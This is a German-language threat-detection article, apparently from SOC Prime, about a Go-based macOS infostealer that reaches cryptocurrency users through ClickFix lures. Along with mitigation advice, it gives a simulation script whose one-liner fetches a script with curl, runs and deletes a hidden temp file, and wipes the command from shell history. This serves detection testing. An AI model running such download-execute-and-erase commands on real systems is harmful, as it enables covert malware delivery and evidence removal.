SOC Prime Bias: Hoch

10 Aug 2026 17:15 UTC

macOS-Infostealer zielt auf Kryptowährungs-Wallets ab

Author Photo
SOC Prime Team linkedin icon Folgen
macOS-Infostealer zielt auf Kryptowährungs-Wallets ab
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Ein auf Go basierender macOS-Stealer zielt auf Kryptowährungsnutzer durch eine ClickFix-Sozialingenieurkampagne ab. Die Malware stiehlt sensible Anmeldeinformationen aus dem Apple-Schlüsselbund und aus Browser-Speichern und verfügt zudem über die Fähigkeit, nach und nach die Kryptowährungsbestände in den Wallets der Opfer zu leeren. Die Infektionskette beginnt mit einem Shell-Skript-Profiler, der architekturspezifische Mach-O-Nutzlasten liefert.

Untersuchung

Huntress-Analysten entdeckten die Bedrohung während einer retrospektiven Suche und identifizierten Komponenten eines macOS-spezifischen Stealers, der etwa drei Monate lang aktiv geblieben war. Die Untersuchung verknüpfte die unterstützende Infrastruktur mit der Aeza Group, einem sanktionierten russischen bulletproof Hosting-Anbieter. Forscher rekonstruierten die Angriffskette vom anfänglichen ClickFix-Sozialtechnik-Anstoß bis zur endgültigen Ausführung der Nutzlast und der C2-Kommunikation.

Minderung

Nutzer sollten es vermeiden, mit verdächtigen CAPTCHA-Aufforderungen zu interagieren oder ungewöhnlichen Anweisungen zu folgen, die erfordern, dass Befehle im Terminal eingegeben werden. Browsererweiterungen, die zur Einschränkung bösartiger Skripte entwickelt wurden, wie NoScript, und DNS-basierte Blockierungstools wie Pi-hole können dazu beitragen, die Exposition zu reduzieren. Umfassende Schulungen zur Nutzerbewusstseinsbildung, die sich auf ClickFix-Sozialtechnik konzentrieren, bleiben eine der effektivsten Verteidigungen.

Antwort

Wenn eine Infektion festgestellt wird, sollte das betroffene macOS-System sofort isoliert werden, um weiteren Datenabfluss oder das Leeren der Kryptowährungswallets zu stoppen. Administratoren sollten alle bösartigen Mach-O-Binärdateien und damit verbundene Persistenzmechanismen lokalisieren und entfernen. Da die Malware Anmeldeinformationen anvisiert, sollten die Passwörter aller von dem kompromittierten Gerät aus zugegriffenen Konten zurückgesetzt werden.

Angriffsfluss

Simulation-Ausführung

Voraussetzung: Der Telemetrie- & Basiswert-Vorflug-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und das Szenario MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer initiiert einen ClickFix-Betrug. Das Opfer wird dazu verleitet, einen Befehl in seinem Terminal auszuführen. Der Befehl verwendet curl -kFsSL um ein bösartiges Skript stillschweigend herunterzuladen. Um keine Spuren zu hinterlassen, wird das Skript über einen Bash-One-Liner ausgeführt, der sofort seine eigene temporäre Datei löscht (.UlaccK). Schließlich führt der Angreifer einen komplexen history -Befehl aus, um den Befehl gezielt aus dem Shell-Verlauf des Benutzers zu entfernen, wodurch der Angriff für eine ungezwungene forensische Untersuchung unsichtbar wird.

  • Regressionstests-Skript:

    #!/bin/bash
    # Simulation des ClickFix macOS-Malware-Angriffs
    # Dieses Skript ahmt die genauen Zeichenfolgenmuster nach, die von der Erkennungsregel gefordert werden.
    
    echo "[+] Simulation wird gestartet..."
    
    # 1. Simulierung des Curl-Downloads (Auswahl 3)
    # 2. Simulierung der Bash-Ausführung und sofortigen Löschung (Auswahl 1)
    # 3. Simulierung der Verlaufmanipulation (Auswahl 2)
    
    # Wir kombinieren diese in eine einzelne Zeile, um das Verhaltensmuster nachzuahmen
    # Hinweis: Wir verwenden eine Dummy-URL, um eine tatsächliche Malware-Ausführung zu vermeiden
    curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}')
    
    echo "[+] Simulationsbefehl ausgeführt."
    echo "[!] Überprüfen Sie Ihr SIEM auf den 'Wallet-Depleting macOS Malware Attack'-Alarm."
  • Säuberungskommandos:

    # Entfernen Sie alle Überbleibsel der Simulation
    rm -f .UlaccK
    # Hinweis: Die Verlaufmanipulation im Skript soll der Evasion dienen;
    # eine manuelle Wiederherstellung des Verlaufs könnte für den Testbenutzer erforderlich sein.